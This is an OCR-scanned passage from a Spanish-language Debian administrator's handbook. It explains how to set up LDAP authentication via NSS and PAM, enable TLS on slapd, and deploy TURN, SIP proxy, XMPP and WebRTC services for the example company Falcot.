informacion  para  directories  de  sistemas.  Utilizar  LDAP  como  fuente  de  datos  para  NSS  requiere 
instalar  el  paquete  libnss-ldap.  Al  hacerlo,  se  haran  unas  pocas  preguntas  cuyas  respuestas  estan 
resumidas  en  laTabla  11.2  . 

Luego  necesita  modificar  el  archivo  /etc/nsswitch .  conf  para  configurar  que  NSS  utilice  el 
modulo  Idap  recien  instalado. 


Ejemplo  11.26  El  archivo  /etc/nsswitch .  conf 


#  /etc/nsswitch . conf 

# 

#  Ejemplo  de  configuracion  de  la  f uncionalidad  de  GNU  Name  Service 

#  Switch.  Si  estan  instalados  los  paquetes  «glibc-doc»  e  «info», 

#  intente  «info  libc  "Name  Service  Switch"»  para  mas  informacion 

#  sobre  este  archivo. 
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Pregunta 

Respuesta 

Identificar  de  recurso  uniforme  (URl)  del 
servidor  LDAP 

ldap://ldap. falcot.com 

Nombre  distinguido  de  la  base  de  busqueda 

dc=falcot,dc=com 

Version  LDAP  a  utilizar 

3 

^La  base  de  datos  LDAP  requiere  inicio  de  se- 
sion? 

no 

Permisos  LDAP  especiales  para  root 

si 

Modifique  el  archivo  de  configuracion  para 
que  solo  pueda  ser  leido/escrito  por  su  due- 
no 

no 

cuenta  LDAP  para  root 

cn=admin,dc=falcot,dc=com 

contrasena  de  la  cuenta  root  de  LDAP 

la  contrasena  de  administracion 

Cuadro  1 1.2 


Configuracion  del  paquete  Ibnss-ldap 


passwd:  Idap  compat 
group:  Idap  compat 
shadow:  Idap  compat 

hosts:  files  dns  Idap 
networks:  Idap  files 

protocols:  Idap  db  files 
services:  Idap  db  files 
ethers:  Idap  db  files 
rpc:  Idap  db  files 

netgroup:  Idap  files 


Generalmente  agregara  el  modulo  Idap  antes  que  los  demas  para  que,  de  esa  forma,  sea  consul- 
tado  primero.  La  excepcion  notable  es  el  servicio  hosts  ya  que  para  contactar  el  servidor  LDAP 
necesita  una  consulta  de  DNS  primero  (para  resolver  ldap.falcot.com).  Sin  esta  excepcion,  una 
consulta  de  nombres  intentarfa  consultar  al  servidor  LDAP;  esto  dispararfa  una  resolucion  de 
nombres  para  el  servidor  LDAP,  y  as!  sucesivamente  en  un  ciclo  infinito. 

Si  se  debe  considerar  al  servidor  LDAP  como  autoritativo  (e  ignorar  los  archivos  locales  utiliza- 
dos  por  el  modulo  files),  puede  configurar  los  servicios  con  la  siguiente  sintaxis: 

serv/c/o:  I  dap  [NOTFOUND=return]  files. 

Si  la  entrada  solicitada  no  existe  en  la  base  de  datos  LDAP,  la  consulta  devolvera  la  respuesta 
«inexistente»  aun  cuando  el  recurso  exista  en  uno  de  los  archivos  locales;  solo  se  utilizaran  estos 
archivos  locales  cuando  el  servicio  LDAP  este  caido. 
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Configuracion  de  PAM 

Esta  seccion  describe  una  configuracion  PAM  (revise  el  recuadro  «/etc/environment  y  /etc/ 
default/locale»  pagina  155)  que  permitira  a  las  aplicaciones  realizar  las  autenticaciones  ne- 
cesarias  contra  la  base  de  datos  LDAP. 


PRECAUCION  Modificar  la  configuracion  estandar  de  PAM  utilizada  por  varios  programas  es  una 

Autenticacion  rota  operacion  delicada.  Un  error  puede  llevar  a  una  autenticacion  rota,  lo  que  podri'a 

impedir  iniciar  sesiones.  Por  lo  que  recomendamos  mantener  una  consola  de  root 
abierta.  Si  ocurriera  cualquier  error  de  configuracion,  podri'a  solucionarlo  y  reiniciar 
los  servicios  facilmente. 


El  paquete  libpam-ldap  provee  el  modulo  LDAP  para  PAM.  La  instalacion  de  este  paquete  realiza 
unas  pocas  preguntas  muy  similares  a  aquellas  en  el  paquete  libnss-ldap;  algunos  parametros  de 
configuracion  (como  el  URI  del  servidor  LDAP)  son  inclusive  compartidos  con  el  paquete  libnss- 
ldap.  Encontrara  resumidas  las  respuestas  en  la  Tabla  11.3  . 


Pregunta 

Respuesta 

^Permitir  a  la  cuenta  de  administracion 
LDAP  comportarse  como  root  local? 

Si.  Esto  permite  utilizar  el  programa  passwd 
tipico  para  modificar  las  contrasenas  alma- 
cenadas  en  la  base  de  datos  LDAP. 

^La  base  de  datos  LDAP  requiere  inicio  de  se- 
sion? 

no 

cuenta  LDAP  para  root 

cn=admin,dc=falcot,dc=com 

contrasena  de  la  cuenta  root  de  LDAP 

la  contrasena  de  administracion  de  la  base 
de  datos  LDAP 

Algoritmo  local  de  cifrado  para  las  contrase¬ 
nas 

crypt 

Cuadro  11.3  Configuracion  de  libpam-ldap 

Instalar  el  paquete  libpam-ldap  automaticamente  adapta  la  configuracion  PAM  predetermina- 
da  definida  en  los  archivos  /etc/pam .  d/common  -  auth,  /etc/pam .  d/common  -  passwo  rd  y  /etc/ 
pam. d/common- account.  Este  mecanismo  utiliza  la  herramienta  dedicada  pam-auth-update 
(provista  por  el  paquete  libpam-runtime).  El  administrador  tambien  puede  utilizar  esta  herra¬ 
mienta  si  desea  activar  o  desactivar  modulos  PAM. 


Proteccion  de  intercambios  de  datos  LDAP 

De  forma  predeterminada,  el  protocolo  LDAP  se  transmite  por  la  red  como  texto  piano;  inclu- 
yendo  las  contrasenas  (cifradas).  Debido  a  que  se  pueden  obtener  las  claves  cifradas  de  la  red, 
pueden  ser  vulnerables  a  ataques  de  tipo  diccionario.  Puede  evitarlo  aplicando  una  capa  extra 
de  cifrado;  el  tema  de  esta  seccion  es  como  activar  esta  capa. 
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Configuracion  del  servidor  El  primer  paso  es  crear  un  par  de  Haves  (compuestas  de  una  Have 
publica  y  una  Have  privada)  para  el  servidor  LDAP.  Los  administradores  de  Lalcot  reutilizaron 
easy-rsa  para  generarlas  (revise  la  Seccion  10.2.1.1,  «Infraestructura  de  Have  publica:  easy-rsa» 
pagina  239.  Si  ejecuta  ./build-server-key  Idap .  falcot .  com  debera  responder  unas  pocas 
preguntas  mundanas  (ubicacion,  nombre  de  la  organizacion,  etc.).  La  respuesta  a  la  pregunta  por 
el  «nombre  comun»  («common  name»)  debe  ser  el  nombre  de  equipo  completamente  calificado 
del  servidor  LDAP;  en  nuestro  caso:  ldap.falcot.com. 

Este  programa  crea  un  certificado  en  el  archivo  keys/ldap .  falcot .  com.  crt;  la  Have  privada 
correspondiente  es  almacenada  en  keys/ldap .  falcot .  com .  key. 

Ahora  debe  instalar  estas  Haves  en  sus  ubicaciones  estandar  y  debemos  asegurarnos  que  el  ser¬ 
vidor  LDAP,  que  ejecuta  bajo  la  identidad  del  usuario  openldap,  pueda  leer  el  archivo  privado: 

#  adduser  openldap  ssl-cert 

Adding  user  'openldap'  to  group  'ssl-cert'  ... 

Adding  user  openldap  to  group  ssl-cert 
Done . 

#  mv  keys/ldap. falcot. com. key  /etc/ssl/private/ldap. falcot. com. key 

#  chown  root : ssl-cert  /etc/ssl/private/ldap. falcot. com. key 

#  chmod  0640  /etc/ssl/private/ldap. falcot. com. key 

#  mv  newcert.pem  /etc/ssl/certs/ldap. falcot . com . pem 


Tambien  necesita  indicarle  al  demonio  slapd  que  utilice  estas  Haves  para  el  cifrado.  La  configu¬ 
racion  del  servidor  LDAP  es  gestionada  de  forma  dinamica:  puede  actualizar  la  configuracion 
con  operaciones  LDAP  normales  en  la  jerarquia  de  objetos  cn=config  y  el  servidor  actualiza- 
ra  /etc/ldap/slapd .  d  en  tiempo  real  para  que  la  configuracion  sea  persistente.  Por  lo  tanto, 
Idapmodify  es  la  herramienta  correcta  para  actualizar  la  configuracion: 


Ejemplo  11.27  Configuracion  de  slapd  para  cifrado 


#  cat  >ssl.ldif  «END 
dn:  cn=config 
changetype:  modify 

add:  olcTLSCertificateFile 

olcTLSCertif icateFile :  /etc/ssl/certs/ldap. falcot . com . pem 
add:  olcTLSCertif icateKeyFile 

olcTLSCertif icateKeyFile :  /etc/ssl/private/ldap . falcot . com . key 
END 

#  Idapmodify  -Y  EXTERNAL  -H  Idapi:///  -f  ssl.ldif 

SASL/EXTERNAL  authentication  started 

SASL  username :  gidNumber=0+uidNumber=0, cn=peercred , cn=external , cn=auth 
SASL  SSF :  0 

modifying  entry  "cn=config" 
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HERRAMIENTA  Con  Idapvi  puede  mostrar  cualquier  seccion  del  directorio  LDAP  en  formato  LDIF, 
Idapvi  para  editar  un  realizar  cambios  en  el  editor  de  texto  y  dejar  que  la  herramienta  realice  las  opera- 
directorio  LDAP  clones  LDAP  correspondientes. 

Por  lo  tanto,  es  una  forma  conveniente  para  actualizar  la  configuracion  del  servidor 
LDAP  simplemente  editando  la  jerarqufa  cn=config. 

#  Idapvi  -Y  EXTERNAL  -h  Idapi:///  -b  cn=config 


El  ultimo  paso  para  activar  el  cifrado  involucra  cambiar  la  variable  SLAPD_SERVICES  en  el  archi- 
vo  /etc/def ault/slapd.  Para  esta mas  seguros  desactivaremos  LDAP  inseguro  completamente. 


Ejemplo  11.28  El  archivo  /etc/def ault/ slapd 

#  Ubicacion  predeterminada  del  archivo  slapd. conf  o  el  directorio  cn=config 

#  de  slapd. d.  Si  esta  vacio,  utilice  el  valor  predeterminado  durante  la 

#  compilacion  (/etc/ldap/slapd . d  con  /etc/ldap/slapd . conf  como  respaldo) . 
SLAPD  C0NF= 

#  Cuenta  del  sistema  bajo  la  que  se  ejecutara  el  servidor  slapd.  Si  esta 

#  vacio,  el  servidor  ejecutara  como  root. 

SLAPD  USER="openldap" 

#  Grupo  del  sistema  bajo  el  que  se  ejecutara  el  servidor  slapd.  Si  esta 

#  vacio,  el  servidor  ejecutara  en  el  grupo  primario  de  su  usuario. 

SLAPD  GROUP="openldap" 

#  Ruta  al  archivo  de  pid  del  servidor  slapd.  Si  no  esta  definido,  el  script 

#  init.d  intentara  adivinarlo  basandose  en  $SLAPD_CONF 

#  (/etc/ldap/slapd . conf  de  forma  predeterminada) 

SLAPD_PIDFILE= 

#  slapd  normalmente  provee  solo  Idap  en  todos  los  puertos  TCP  389.  slapd 

#  tambien  puede  atender  pedidos  en  el  puerto  TCP  636  (Idaps)  y  a  traves 

#  de  zocalos  unix. 

#  Ejemplo  de  uso: 

#  SLAPD  SERVICES="ldap://127. 0.0. 1:389/  Idaps:///  Idapi:///" 

SLAPD  SERVICES="ldaps : ///  Idapi : ///" 

#  Si  esta  definida  SLAPDNOSTART,  el  script  de  inicializacion  no  iniciara 

#  o  reiniciara  slapd  (podra  detenerlo,  sin  embargo).  Descomente  esta  linea 

#  si  esta  iniciando  slapd  por  otros  medios  o  no  desea  que  inicie  slapd 

#  durante  el  arranque  del  equipo. 

#SLAPD_N0_START=1 

#  Si  SLAPDSENTINELFILE  esta  configurado  como  la  ruta  a  un  archivo  y  dicho 

#  archivo  exist,  el  script  de  inicializacion  no  iniciara  o  reiniciara  slapd 

#  (podra  detenerlo,  sin  embargo).  Utilicelo  para  desactivar  temporalmente 
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#  el  inicio  de  slapd  (por  ejemplo,  mientras  realiza  mantenimiento  o  con  un 

#  sistema  de  administ racion  de  configuraciones)  cuando  no  desee  editar 

#  un  archivo  de  configuracion . 

SLAPD  SENTINEL  FILE=/etc/ldap/noslapd 

#  Para  autenticacion  Kerberos  (a  traves  de  SASL) ,  slapd  utiliza  el  archivo 

#  keytab  del  sistema  (/etc/krb5 . keytab)  de  forma  predeterminada .  Descomente 

#  esta  linea  y  cambie  la  ruta  si  desea  utilizar  otro  archivo  keytab. 

#export  KRB5_KTNAME=/etc/krb5 . keytab 

#  Opciones  adicionales  para  slapd 
SLAPD  0PTI0NS=" " 


Configuracion  del  cliente  En  lado  cliente,  necesita  modificar  la  configuracion  de  los  modulos 
libpam-ldap  y  libnss-ldap  para  que  utilicen  una  URI  [daps://. 

Los  clientes  LDAP  tambien  necesitan  poder  autenticar  el  servidor.  En  una  infraestructura  de  Ha¬ 
ve  publica  X.509,  los  certificados  publicos  estan  firmados  con  la  Have  de  una  autoridad  de  certifi- 
cacion  (CA).  Con  easy-rsa,  los  administradores  de  Lalcot  crearon  su  propia  CA  y  ahora  necesitan 
configurar  el  sistema  para  confiar  en  las  firmas  de  la  CA  de  Lalcot.  Puede  lograr  esto  ubican- 
do  el  certificado  de  la  CA  En  /usr/local/share/ca-  certificates  y  ejecutando  update-ca- 
certificates. 


#  cp  keys/ca.crt  /usr/local/share/ca-certif icates/falcot . crt 

#  update-ca-certificates 

Updating  certificates  in  /etc/ssl/certs . . .  1  added,  0  removed;  done. 
Running  hooks  in  /etc/ca-certif icates/update . d . . . . 

Adding  debian : f alcot . pern 
done . 
done . 


Por  ultimo,  puede  modificar  la  URI  LDAP  predeterminada  y  el  DN  base  predeterminado  utiliza- 
do  por  varias  herramientas  de  linea  de  ordenes  en  el  archivo  /etc/ldap/ldap .  conf .  Esto  le 
ahorrara  bastante  tiempo. 
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Ejemplo  11.29  El  archivo  /etc/ldap/ldap.conf 


# 

#  Valores  predeterminados  para  LDAP 

# 

#  Revise  ldap.conf(5)  para  mas  detalles 

#  Este  archivo  debe  poder  ser  leido  (pero  no  escrito)  por  cualquiera. 

BASE  dc=falcot , dc=com 

URI  Idaps : //Idap . falcot . com 

#SIZELIMIT  12 

#TIMELIMIT  15 

#DEREF  never 

#  Certificados  TLC  (necesarios  para  GnuTLS) 

TLSCACERT  /etc/ssl/certs/ca-certificates . crt 


11.8.  Servicios  de  comunicacion  en  tiempo  real 

Los  servicios  de  comunicacion  en  tiempo  real  ( Real-Time  Communication,  RTC)  agrupan  los  servi¬ 
cios  de  voz  sobre  IP,  video/webcam,  mensajeria  instantanea  ( instant  messaging,  IM)  y  de  compar- 
ticion  de  escritorio.  Este  capitulo  proporciona  una  breve  introduccion  a  tres  servicios  necesarios 
para  una  infraestructura  de  comunicaicon  en  tiempo  real:  un  servidor  TURN,  un  servidor  SIP  y 
un  servidor  XMPP.  Se  pueden  encontrar  explicaciones  mas  extensas  de  como  planificar,  instalar 
y  gestionar  estos  servicios  en  ingles  en  Real-Time  Communications  Quick  Start  Guide,  que  contiene 
incluso  ejemplos  especificos  para  Debian. 

+■  http://rtcquickstart.org 

Tanto  SIP  como  XMPP  pueden  proporcionar  la  misma  funcionalidad.  SIP  es  algo  mas  conociod 
para  la  voz  sobre  IP  y  para  el  video,  mientras  que  XMPP  se  utiliza  como  protocolo  de  mensajeria 
instantanea.  En  realidad  ambos  pueden  ser  utilizados  para  cualquier  ade  estos  servicios.  Para 
optimizar  las  opciones  de  conectividad  se  recomienda  utilizar  ambos  en  paralelo. 

Estos  dos  servicios  utilizan  certificados  X.509  para  garantizar  la  confidencialidad  y  la  autenti- 
cacion.  La  Seccion  10.2.1.1,  «Infraestructura  de  Have  publica:  easy-rsa»  pagina  239  proporciona 
mas  detalles  acerca  de  la  creacion  de  estos  certificados.  De  forma  alternativa  tambien  puede 
encontrar  informacion  muy  util  en  la  Real-Time  Communications  Quick  Start  Guide  (en  ingles): 

http :// rtcquicksta  rt . org/guide/multi/tls . html 
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11.8.1.  Parametros  DNS  para  los  servicios  RTC 


Los  servicios  RTC  requieren  registros  DNS  SRV  y  NAPTR.  He  aquf  un  ejemplo  de  configuracion 
que  se  podrfa  incluir  en  el  fichero  de  zona  para  falcot.com: 

;  the  server  where  everything  will  run 

served  IN  A  198.51.100.19 

served  IN  AAAA  2001 :  DB8 : 1000 : 2000 ::  19 


;  IPv4  only  for  TURN  for  now,  some  clients  are  buggy  with  IPv6 
turn-server  IN  A  198.51.100.19 


;  IPv4  and  IPv6  addresses  for  SIP 

sip-proxy  IN  A  198.51.100.19 

sip-proxy  IN  AAAA  2001 : DB8 : 1000 : 2000 :: 19 


;  IPv4  and  IPv6 

xmpp-gw 

xmpp-gw 


addresses  for  XMPP 

IN  A  198.51.100.19 

IN  AAAA  2001 : DB8 : 1000 : 2000 : : 19 


;  DNS  SRV  and  NAPTR  for  STUN  /  TURN 
stun.udp  IN  SRV  0  1  3467  turn-server.falcot.com. 

turn.udp  IN  SRV  0  1  3467  turn-server.falcot.com. 

@  IN  NAPTR  10  0  "s"  "RELAY : turn . udp"  ""  turn._udp.falcot.com. 


;  DNS  SRV  and  NAPTR  records  for  SIP 
sips.tcp  IN  SRV  0  1  5061  sip-proxy.falcot.com. 

@  IN  NAPTR  10  0  "s"  "SIPS+D2T"  ""  sips,  tcp.falcot.com. 


;  DNS  SRV  records  for  XMPP  Server  and  Client  modes: 
xmpp-client ,_tcp  IN  SRV  5  0  5222  xmpp-gw.falcot.com. 

xmpp-server.tcp  IN  SRV  5  0  5269  xmpp-gw.falcot.com. 


1 1.8.2.  Servidor  TURN 

TURN  es  un  servicio  que  permite  a  los  clientes  que  se  encuentran  detras  de  un  router  o  fire¬ 
wall  con  NAT  encontrar  el  camino  mas  eficaz  para  comunicarse  con  otros  clientes  y  en  caso 
de  no  encontrarse  ningun  camino  directo  retransmitir  los  flujos  de  voz  y  datos.  Se  recomienda 
vivamente  instalar  un  servidor  TURN  antes  de  ofrecer  ningun  otro  servicio  RTC  a  los  usuarios 
finales. 

TURN  y  el  protocolo  ICE  son  estandares  abiertos.  Para  sacar  provecho  de  estos  protocolos,  maxi- 
mizando  la  conectividady  minimizando  la  frustracion  de  los  usuarios,  es  importante  asegurarse 
que  todos  los  programas  cliente  sean  compatibles. 

Para  que  el  agoritmo  ICE  funcione  eficazmente,  el  servidor  tiene  que  tener  do  direcciones  IPv4 
publicas. 
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Instalacion  de  un  servidor  TURN 


Instale  el  paquete  resiprocate-tum-server. 

Edite  el  archivo  de  configuracion  /etc/reTurn/reTurnServer.  config.  Lo  mas  importante  es 
configurar  las  direcciones  IP  del  servidor. 

#  your  IP  addresses  go  here: 

TurnAddress  =  198.51.100.19 
TurnV6Address  =  2001 : DB8 : 1000 : 2000 :: 19 
AltStunAddress  =  198.51.100.20 

#  your  domain  goes  here,  it  must  match  the  value  used 

#  to  hash  your  passwords  if  they  are  already  hashed 

#  using  the  HA1  algorithm: 

AuthenticationRealm  =  myrealm 

UserDatabaseFile  =  /etc/reTurn/users . txt 
UserDatabaseHashedPasswords  =  true 

Reiniciar  el  servicio. 


Gestionar  los  usuarios  de  TURN 

Utilice  la  herramienta  htdigest  para  gestionar  la  lista  de  usuarios  del  servidor  TURN. 

#  htdigest  /etc/reTurn/users .txt  myrealm  joe 

Despues  de  cualquier  modification  en  /etc/reTurn/users  .  txt  se  debe  notificar  la  serial  HUP 
para  que  el  servidor  lo  recargue  (o  tambien  se  puede  autorizar  la  recarga  automatica  en  /etc/ 
reTurn/reTurnServer.  config). 


11.8.3.  Servidor  Proxy  SIP 

Un  servidor  proxy  SIP  gestiona  las  conexiones  SIP  entrantes  y  salientes  entre  distintas  organi- 
zaciones,  los  proveedores  de  enlaces  SIP  (SIP  trunking),  las  centralitas  privadas  (Private  Automatic 
Branch  exchange,  PBX)  como  Asterisk,  los  telefonos  y  programas  de  telefonia  SIP  y  las  aplicacio- 
nes  WebRTC. 

Es  altamente  recomendable  instalar  y  configurar  un  proxy  SIP  antes  de  intentar  poner  en  servi¬ 
cio  una  centralita  ( PBX ).  El  proxy  SIP  normaliza  en  gran  medida  el  trafico  que  llega  a  la  centralita 
y  proporciona  una  mayor  conectividady  resiliencia. 


Instalacion  de  un  proxy  SIP 

Instalar  el  paquete  repro.  Se  recomienda  el  uso  del  paquete  desd ejessie-backports,  ya  que  cuenta 
con  las  ultimas  mejoras  de  mejora  de  conectividad  y  resiliencia. 
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Editar  el  fichero  de  configuracion  /etc/repro/repro .  config.  Lo  mas  importante  es  poner  la 
direccion  IP  del  sevidor.  El  ejemplo  de  mas  abajo  muestra  como  configurar  tanto  SIP  como  Web- 
Sockets/WebRTC,  haciendo  uso  de  TLS,  IPv4  e  IPv6: 

#  Transportl  sera  para  SIP  sobre  conexiones  TLS 

#  Aqui  usamos  el  puerto  5061,  pero  si  tiene  clientes  que  se  conectan  desde 

#  lugares  con  firewalls  puede  cambiarlo  para  que  escuche  en  el  puerto  443 
Transportllnterface  =  198.51.100.19:5061 

TransportlType  =  TLS 
TransportlTlsDomain  =  falcot.com 
TransportlTlsClientVerif ication  =  Optional 
TransportlRecordRoutellri  =  sip :  falcot .  com;  t ransport=TLS 
TransportlTlsPrivateKey  =  /etc/ssl/private/falcot . com-key . pern 
TransportlTlsCertif icate  =  /etc/ssl/public/falcot . com . pern 

#  Transport2  es  la  version  IPv6  de  Transportl 
Transport2Interface  =  2001 : DB8 : 1000 : 2000 :: 19 : 5061 
Transport2Type  =  TLS 

Transport2TlsDomain  =  falcot.com 
Transport2TlsClientVerif ication  =  Optional 
Transport2RecordRoutellri  =  sip :  falcot .  com;  transport=TLS 
Transport2TlsPrivateKey  =  /etc/ssl/private/falcot . com-key . pern 
Transport2TlsCertif icate  =  /etc/ssl/public/falcot . com . pern 

#  Transports  sera  para  SIP  sobre  conexiones  WebSocket  (WebRTC) 

#  Aqui  usamos  el  puerto  8443,  pero  puede  hacer  uso  del  443 
Transport3Interface  =  198.51.100.19:8443 
Transport3Type  =  WSS 

Transport3TlsDomain  =  falcot.com 

#  Podria  requerir  que  el  navegador  envie  un  certificado  pero,  actualmente 

#  parece  que  los  navegadores  no  pueden  hacerlo,  por  lo  que  dejelo  como  None: 
Transport3TlsClientVerif ication  =  None 

Transport3RecordRoutellri  =  sip :  falcot .  com;  transport=WSS 
Transport3TlsPrivateKey  =  /etc/ssl/private/falcot . com-key . pern 
Transport3TlsCertif icate  =  /etc/ssl/public/falcot . com . pern 

#  Transport4  es  la  version  IPv6  de  Transports 
Transport4Interface  =  2001 : DB8 : 1000 : 2000 :: 19 : 8443 
Transport4Type  =  WSS 

Transport4TlsDomain  =  falcot.com 
Transport4TlsClientVerif ication  =  None 
Transport4RecordRouteUri  =  sip : falcot . com; transport=WSS 
Transport4TlsPrivateKey  =  /etc/ssl/private/falcot . com-key . pern 
Transport4TlsCertif icate  =  /etc/ssl/public/falcot . com . pern 

#  Transport5:  Podria  ser  para  conexiones  TCP  a  un  servidor  Asterisk 

#  de  su  red  interna.  No  habilite  el  puerto  5060  a  traves  del  firewall 

#  externo. 

Transport5Interface  =  198.51.100.19:5060 
Transport5Type  =  TCP 
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Transport5RecordRoutellri  =  sip  :  198 . 51 . 100 . 19 :  5060 ;  t  ransport=TCP 


HttpBindAddress  =  198.51.100.19,  2001 : DB8 : 1000 : 2000 :: 19 
HttpAdminUserFile  =  /etc/repro/users . txt 

RecordRouteUri  =  sip : falcot . com; t ransport=tls 
ForceRecordRouting  =  true 

EnumSuffixes  =  el64.arpa,  sip5060.net,  el64.org 
DisableOutbound  =  false 
EnableFlowTokens  =  true 
EnableCertificateAuthenticator  =  True 

Use  la  utilidad  htdigest  para  gestionar  la  contrasena  del  administrador  del  interfaz  web.  El 
nombre  del  usuario  debe  ser  admin  y  el  realm  debe  coincidir  con  el  indicado  en  rep  ro .  conf  ig. 

#  htdigest  /etc/repro/users . txt  repro  admin 

Reinicie  el  servicio  para  usar  la  nueva  configuracion. 


Gestionando  el  proxy  SIP 

Vaya  al  interfaz  web  en  http://sip-proxy.falcot.com:5080  para  completar  la  configuracion  ana- 
diendio  dominios,  usuarios  locales  y  rutas  estaticas. 

El  primer  paso  es  anadir  el  dominio  local.  El  proceso  debe  reiniciarse  tras  agregar  o  quitar  do¬ 
minios  de  la  lista. 

El  proxy  sabe  como  dirigir  las  llamadas  entre  usuarios  locales  y  direcciones  completas  SIP.  La 
configuracion  de  redireccion  solo  es  necesaria  cuando  se  desea  modificar  el  comportamiento 
por  defecto.  Por  ejemplo,  para  reconocer  numeros  de  telefono,  anadir  un  prefijo  y  redirigirlos  a 
un  proveedor  SIP. 


1 1.8.4.  Servidor  XMPP 

Un  servidor  XMPP  gestiona  la  conectividad  entre  usuarios  locales  XMPP  y  usuarios  XMPP  en 
otros  dominios  de  la  red  publica  Internet. 

VOCABULARIO  En  ocasiones  se  menciona  XMPP  como  Jabber.  De  hecho,  Jabber  es  una  marca  y 
^XMPP  o  Jabber?  XMPP  es  el  nombre  oficial  del  estandard. 


Prosody  es  un  conocido  servidor  de  XMPP  que  opera  de  modo  fiable  en  servidores  Debian. 


Instalar  el  servidor  XMPP 

Instalar  el  paquete  prosody.  Se  recomienda  el  uso  del  paquete  desde jessie-backports,ya  que  cuenta 
con  las  ultimas  mejoras  de  maximizacion  de  conectividad  y  resiliencia. 
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Revisar  el  fichero  de  configuracion  /etc/p rosody/p rosody .  cfg  .  lua.  Lo  mas  importante  en 
agregar  los  JIDs  de  los  usuarios  a  los  que  se  les  permite  gestionar  el  servidor. 

admins  =  {  "j oe@falcot . com"  } 

Tambien  se  necesita  un  fichero  de  configuracion  por  cada  dominio.  Copiar  el  ejemplo  de  /etc/ 
prosody/conf .  avail/example,  com.  cfg  .  lua  y  usarlo  como  punto  de  partida.  Este  es  falcot. 
com. cfg. lua: 

VirtualHost  "falcot.com" 
enabled  =  true 
ssl  =  { 

key  =  "/etc/ssl/private/falcot . com- key . pem" ; 
certificate  =  "/etc/ssl/public/falcot . com . pem" ; 

} 

Para  activar  el  dominio  debe  haber  un  enlace  simbolico  de  /etc/p rosody/conf  .d/.  Creelo  de 
este  modo: 

#  In  -s  /etc/prosody/conf .avail/f alcot.com. cfg. lua  /etc/prosody/conf . d/ 

Reinicie  el  servicio  para  usar  la  nueva  configuracion. 


Gestionando  el  servidor  XMPP 

Algunas  operaciones  de  gestion  pueden  realizarse  haciendo  uso  de  la  utilidad  de  linea  de 
comandos  prosod  yet  I .  Por  ejemplo,  para  anadir  la  cuenta  del  administrador  especificada  en 
/etc/p rosody/p rosody . cfg .lua: 

#  prosodyctl  adduser  joe@falcot.com 

Para  mas  detalles  sobre  como  personalizar  la  configuracion,  vea  la  documentacion  en  linea  de 
Prosody1. 


1 1.8.5.  Servicios  corriendo  en  el  puerto  443 

Alguno  administradores  prefieren  ejecutar  todos  sus  servicios  RTC  en  el  puerto  443.  Esto  facilita 
a  los  usuarios  conectarse  desde  lugares  remotos,  tales  como  hoteles  y  aeropuertos.  Donde  el  res- 
to  de  puertos  pueden  estar  bloqueados  o  el  trafico  de  Internet  se  redirige  a  traves  de  servidores 
proxy  HTTP. 

Para  usar  esta  estrategia  cada  servicio  (SIP,  XMPP  y  TURN)  necesita  una  direccion  IP  distinta. 
Todos  los  servicios  pueden  estar  todavia  en  el  mismo  equipo,  ya  que  Linux  soporta  multiples  IP 
en  un  solo  equipo.  El  numero  de  puerto,  443,  debe  especificarse  en  los  ficheros  de  configuracion 
de  cada  uno  de  los  procesos,  y  tambien  en  los  registros  SRV  del  DNS. 

^ttp : //prosody .  im/doc/conf igure 
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1 1.8.6.  Agregando  WebRTC 


Falcot  quiere  permitir  a  los  clientes  realizar  llamadas  telefonicas  directamente  desde  el  sitio 
web.  Los  administradores  de  Flacot  tambien  quieren  usar  WebRTC  como  parte  de  su  plan  de 
contingencia,  de  modo  que  el  personal  pueda  hacer  uso  de  los  navegadores  web  desde  casa  y 
hacer  uso  del  sistema  de  telefoma  de  la  empresay  trabajar  normalmente  en  caso  de  emergencia. 


EN  LA  PRACTICA  Si  no  ha  probado  WebRTC  antes,  hay  varios  portales  que  propocionan  una  demos- 
Pruebe  WebRTC  tracion  en  linea  y  facilita  pruebas. 

•-  http : //www. sip5060 .net /test- calls 


WebRTC  es  una  tecnologfa  que  evoluciona  rapidamente,  y  es  esencial  hacer  uso  de  los  paquetes 
de  las  distribuciones jessie-backports  o  Testing. 

JSCommunicator  es  un  telefono  WebRTC  generico  que  no  requiere  de  ningun  script  de  tipo  PF1P 
en  la  parte  servidora.  Esta  construido  exclusivamente  con  HTML,  CSS  y  JavaScript.  Es  la  base  de 
muchos  otros  servicios  y  modulos  WebRTC  empleados  en  frameworks  web  avanzados. 

http ://j scommunicator.org 

El  modo  mas  rapido  de  instalar  un  telefono  WebRTC  en  un  portal  web  es  hacer  uso  del  paque- 
t e  jscommunicator-web-phone.  Requiere  un  proxy  SIP  proxy  con  transporte  WebSocket.  Las  ins- 
truccones  en  Section  11.8.3.1,  «Instalacion  de  un  proxy  SIP»  pagina  313  incluyen  los  detalles 
necesarios  para  habilitar  el  transporte  WebSocket  en  el  proxy  SIP  repro. 

Tras  instalar  jscommunicator-web-phone,  hay  varios  modos  de  usarlo.  Una  estrategia  sencilla  es  in- 
cluir,  o  copiar,  la  configuration  de  /etc/j  s  communicator -web  -  phone/a  pa  che .  con  f  en  la  con¬ 
figuration  de  host  virtual  de  Apache. 

Una  vez  los  ficheros  del  telefono  web  estan  disponibles  en  el  servidor  web,  personalice  /etc/ 
j  s  communicator- web  -  phone/ con  fig  .  j  s  para  que  apunte  al  servidor  TURN  y  al  proxy  SIP.  Por 
ejemplo: 

JSCommSettings  =  { 

//  Entorno  del  servidor  web 
Webserver:  { 

urlprefix:  null  //  Si  se  configura,  prefijo  empleado  para  construir 

*+■  URLs  sound/ 

}, 


//  STUN/TURN  media  relays 
stun  servers :  [], 
turnservers :  [ 

{  server : "turn : tu rn- server . falcot . com?t ransport=udp" ,  username: "joe",  password:" 
j  0Ep455d"  } 

]. 
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//  Conexion  WebSocket 
websocket:  { 

//  Fijese  que  empleamos  el  certificado  del  dominio  falcot.com  y  el  puerto  8443 
//  Esto  coincide  con  los  ejemplos  Transports  y  Transport4  en 
//  el  fichero  repro.config  para  falcot.com 
servers :  'wss : //falcot . com : 8443 ' , 
connectionrecoverymininterval :  2, 
connection  recovery  max  interval :  30 

}, 


Portales  web  mas  avanzados  de  tipo  click-para-llamar  normalmente  hacen  uso  de  scripts  en  la 
parte  de  servidor  para  generar  dinamicamente  el  fichero  config.js.  El  codigo  fuente  de  DruCall2 
muestra  como  hacerlo  con  PHP. 

Este  capitulo  solo  analiza  una  parte  de  todo  el  software  de  servidor  disponible;  sin  embargo, 
describimos  la  mayoria  de  los  servicios  de  red.  Ahora  es  el  momento  de  un  capitulo  aun  mas 
tecnico:  profundizaremos  en  los  detalles  de  algunos  conceptos,  describiremos  los  despliegues 
masivos  y  la  virtualizacion. 


2  http : //d  rucall . org 
